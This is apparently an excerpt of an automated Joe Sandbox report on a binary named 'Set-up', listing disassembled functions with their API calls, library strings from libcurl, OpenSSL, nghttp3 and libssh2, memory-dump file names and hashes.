API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: b7e6a60972456399cd38db98b24086930114b283476d7692905c5d1ddabb9277
Instruction ID: 401cc29fc734f7a0d6563e293611cc857aa3cd1bdcc4123ac53af91fec7adbbd
Opcode Fuzzy Hash: b7e6a60972456399cd38db98b24086930114b283476d7692905c5d1ddabb9277
Instruction Fuzzy Hash: 5B716970604345AFDB25DF24D885BEEBBE5FF88700F448928F8499B2A1E774A940CB52

Function 0052E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00535EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00535ED4

Part of subcall function 00554F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00554F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0052EA9B

Part of subcall function 005306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00535663,?), ref: 005306F9

Strings

HEAD, xrefs: 0052ED9A, 0052EDA2
transfer.c, xrefs: 0052E7F2, 0052E97C, 0052EA7D, 0052EAA5, 0052EAE1, 0052EB46, 0052EB92, 0052EBA8, 0052EBCA, 0052EC43
Clear auth, redirects to port from %u to %u, xrefs: 0052EB1B
The redirect target URL could not be parsed: %s, xrefs: 0052E9E1
Switch from POST to GET, xrefs: 0052ED2B
Switch to %s, xrefs: 0052EDA3
Maximum (%ld) redirects followed, xrefs: 0052EC11
Issue another request to this URL: '%s', xrefs: 0052ECA4
GET, xrefs: 0052ED95
Clear auth, redirects scheme from %s to %s, xrefs: 0052EB84

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: 5d242d9d58f3895242e8b90ab10717539cad9c2137f31a19a28db0dc024acd4e
Instruction ID: cb2e218d5a4f536eca1808e0873936424d50698c6cb5c6e3adec22786c46c100
Opcode Fuzzy Hash: 5d242d9d58f3895242e8b90ab10717539cad9c2137f31a19a28db0dc024acd4e
Instruction Fuzzy Hash: CBF1F471A043156BEB109E24EC8BBA63F94BF52304F084479FD48AE2D7F771AD548762

Function 0070A300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0070A61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0070A632

Part of subcall function 0070A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0070A654,?,PRIVATE KEY), ref: 0070A0BD
Part of subcall function 0070A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0070A0C8
Part of subcall function 0070A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0070A0DF

Part of subcall function 006838A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0068397E

Strings

crypto/pem/pem_pkey.c, xrefs: 0070A555, 0070A802, 0070A831, 0070A85C, 0070A872
ANY PRIVATE KEY, xrefs: 0070A6B4
PARAMETERS, xrefs: 0070A5CF
PUBLIC KEY, xrefs: 0070A5D4, 0070A5F1
pem_read_bio_key_decoder, xrefs: 0070A54E
pem_read_bio_key_legacy, xrefs: 0070A7F8, 0070A827
PEM, xrefs: 0070A3FF
PRIVATE KEY, xrefs: 0070A616, 0070A649
ENCRYPTED PRIVATE KEY, xrefs: 0070A62C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: 001671b479d1cd4de2d08f7e91062f8bb906201b6a78fdf2b70f9d921f5b8fc9
Instruction ID: 72cf59c47b2dd94748aed1962130d4bbc484c21adb76a2b6a25c43a9e0ca1d86
Opcode Fuzzy Hash: 001671b479d1cd4de2d08f7e91062f8bb906201b6a78fdf2b70f9d921f5b8fc9
Instruction Fuzzy Hash: CDD12DB6E04301BBE761BA209C07F2B76D99F90744F044A2CFD48A61D3FA75E91487A7

Function 005FC290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 005FC60E

Strings

feWould block waiting for status message, xrefs: 005FC4A6
Too small FXP_STATUS, xrefs: 005FC517
Too small FXP_HANDLE, xrefs: 005FC582, 005FC675
Response too small, xrefs: 005FC4E3
Timeout waiting for status message, xrefs: 005FC4FB
Unable to allocate new SFTP handle structure, xrefs: 005FC646
Unable to send FXP_OPEN*, xrefs: 005FC45B
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 005FC410
Failed opening remote file, xrefs: 005FC531
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 005FC444

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: 0e227b53b39a73837d42022ddfe3e360751efb0593091f8f10e50a560f1808ce
Instruction ID: 7e473e57fbb3ad8180edfcd54c5ed5b52c0de6c3215196bf3a5709503aecfb43
Opcode Fuzzy Hash: 0e227b53b39a73837d42022ddfe3e360751efb0593091f8f10e50a560f1808ce
Instruction Fuzzy Hash: DBB114705047499BDB10CF28DC49A7BBFE4FF84318F144A2CFA5696292E778E918CB52

Function 0055E270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0055CC57), ref: 0055F028

Strings

TYPE %c, xrefs: 0055E323
STOR_PREQUOTE, xrefs: 0055F1F7
%s%s%s, xrefs: 0055F07B
NLST, xrefs: 0055F05E, 0055F07A
[%s] -> [%s], xrefs: 0055E2E0, 0055E38E, 0055F116, 0055F203
SIZE %s, xrefs: 0055E406
ftp.c, xrefs: 0055F08A, 0055F0BD, 0055F13C
LIST, xrefs: 0055F059, 0055F10A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: 2370880545606d6b4c8d644e0b695d2967edd8aa6b4d6cba7eb58481e47f731c
Instruction ID: 7e60614fd0f69c929fc04de9d8328b37cbcf59ff95ac16a162e8fd9af11cbf9c
Opcode Fuzzy Hash: 2370880545606d6b4c8d644e0b695d2967edd8aa6b4d6cba7eb58481e47f731c
Instruction Fuzzy Hash: EAA157717043049BE7159A14DC6AB7A7FD9FB9130AF0844BAEC488B283E776ED49C790

Function 005BA8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 005BA9E8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,005B71B7,00000001,?,?), ref: 005BAA04
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,005B71B7,00000001,?,?), ref: 005BAA19
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,005B71B7,00000001,?,?), ref: 005BAA2E

Strings

key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key), xrefs: 005BAA14
i < blk->n, xrefs: 005BA9FF
ksl->head, xrefs: 005BAA29
nghttp3_ksl.c, xrefs: 005BA9FA, 005BAA0F, 005BAA24

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
API String ID: 3718630003-2514804127
Opcode ID: 8a55ec87c5c32bb07fa76005e26f4442b70c3ab05344c5629fec50bd8ec9cc5e
Instruction ID: dfe4cff86cd6e14368a128f222951e0f1af3335a038e44b91c017c7651206403
Opcode Fuzzy Hash: 8a55ec87c5c32bb07fa76005e26f4442b70c3ab05344c5629fec50bd8ec9cc5e
Instruction Fuzzy Hash: 1E41AC711043059FDB00DF15CD84F9A7BE5FF59309F1A4498F4898B2A2E732E989CB52

Function 00752370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 0075238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 007523C4
GetLastError.KERNEL32 ref: 00752433

Part of subcall function 00752240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0074F763,?,?,?,?,?), ref: 00752251
Part of subcall function 00752240: WideCharToMultiByte.KERNEL32 ref: 00752284
Part of subcall function 00752240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 007522BD

Strings

ERR_CAPI_error, xrefs: 007523F9
engines/e_capi.c, xrefs: 007523A4, 00752426, 00752466
engines/e_capi_err.c, xrefs: 00752400
%lX, xrefs: 0075243E
capi_cert_get_fname, xrefs: 00752379
Error code= 0x, xrefs: 0075244F

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 64b70e74412fad03335ae6db329c137f6c1d48cb434b512fa47275efab074355
Instruction ID: 436bc3ca0b114ab4fb5acf9645d6ce2bad4c32029e64f21e5f0e1c3c5f63a77e
Opcode Fuzzy Hash: 64b70e74412fad03335ae6db329c137f6c1d48cb434b512fa47275efab074355
Instruction Fuzzy Hash: AF21ABA57403007BF6603665BC47F3F3959D752B06F044078FD09A51E3E5BD491A867A

Function 006F4960 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 381COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 006F49A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 006F4D44
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 006F4E33

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

Strings

No password method specified, xrefs: 006F4BA4
do_ui_passphrase, xrefs: 006F4B5B, 006F4BEC, 006F4C49, 006F4C92, 006F4CED, 006F4D19, 006F4D58, 006F4E69
info, xrefs: 006F49DE
crypto/passphrase.c, xrefs: 006F4AC8, 006F4B15, 006F4B65, 006F4B97, 006F4BBA, 006F4BF6, 006F4C2E, 006F4C53, 006F4C9C, 006F4CF7, 006F4D62, 006F4D8E, 006F4DA2, 006F4DB9, 006F4E13, 006F4E70
ossl_pw_get_passphrase, xrefs: 006F4B8D, 006F4BB0, 006F4C24
Prompt info data type incorrect, xrefs: 006F4BC7
pass phrase, xrefs: 006F4A9C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy$strcpystrlen
String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
API String ID: 699153967-1272933286
Opcode ID: e9981969a3c63a0013d3baea5dcded3671fb9427ad91a84d905ff7a465cb0f52
Instruction ID: 9c7e809165651bed15ec02cbe84664aa2a5166fd109d465b245152fe19945dd6
Opcode Fuzzy Hash: e9981969a3c63a0013d3baea5dcded3671fb9427ad91a84d905ff7a465cb0f52
Instruction Fuzzy Hash: 50C14B70B48305BBD7607A609C47F3B7AE7EF50B04F04082CFA89566D3EAB5D9149A53

Function 00540762 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 377stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00540794

Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0054356E

Strings

ssh error, xrefs: 0054470D, 00544718
Unknown error in libssh2, xrefs: 0054386C, 00543874
Creating the dir/file failed: %s, xrefs: 00543875
Upload failed: %s (%lu/%d), xrefs: 00544719
Bad file size (%lld), xrefs: 00544D42
Failed to read data, xrefs: 00544CD7
Could not seek stream, xrefs: 00544D26

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
API String ID: 2413861649-3110757985
Opcode ID: cc85d1d42276cd674a05fce24e3abfb975ad211ebb2884be02031d21063bef4a
Instruction ID: 46cd2224970eae1d4d97be307a3179863a09fdf69999eb909674028da544b36b
Opcode Fuzzy Hash: cc85d1d42276cd674a05fce24e3abfb975ad211ebb2884be02031d21063bef4a
Instruction Fuzzy Hash: EDE1D3B1A047019FD715DF28C885BAABBE5FF84308F144A78F9598B352DB71AE04CB91

Function 005748F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0057491A
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 0057497C
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 005749F1
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574ABB
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574B21
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574BCF
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574C33
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00574CDD
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00574D30

Strings

0123456789, xrefs: 0057490D, 00574915, 00574977, 005749A2, 005749EC, 00574A0D, 00574AB6, 00574AE1, 00574B1C, 00574B3D, 00574BCA, 00574BF3, 00574C2E, 00574C4F, 00574CD8, 00574CF8, 00574D20, 00574D2B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memchr
String ID: 0123456789
API String ID: 3297308162-2793719750
Opcode ID: b4033fbd99d4d8e3f531505dde1f411cfcd84fa93d8635d62beb2c4538d5430e
Instruction ID: ee688b5a954540445f7ac7991481869984e0584e0d9446826ece7e39a80105ef
Opcode Fuzzy Hash: b4033fbd99d4d8e3f531505dde1f411cfcd84fa93d8635d62beb2c4538d5430e
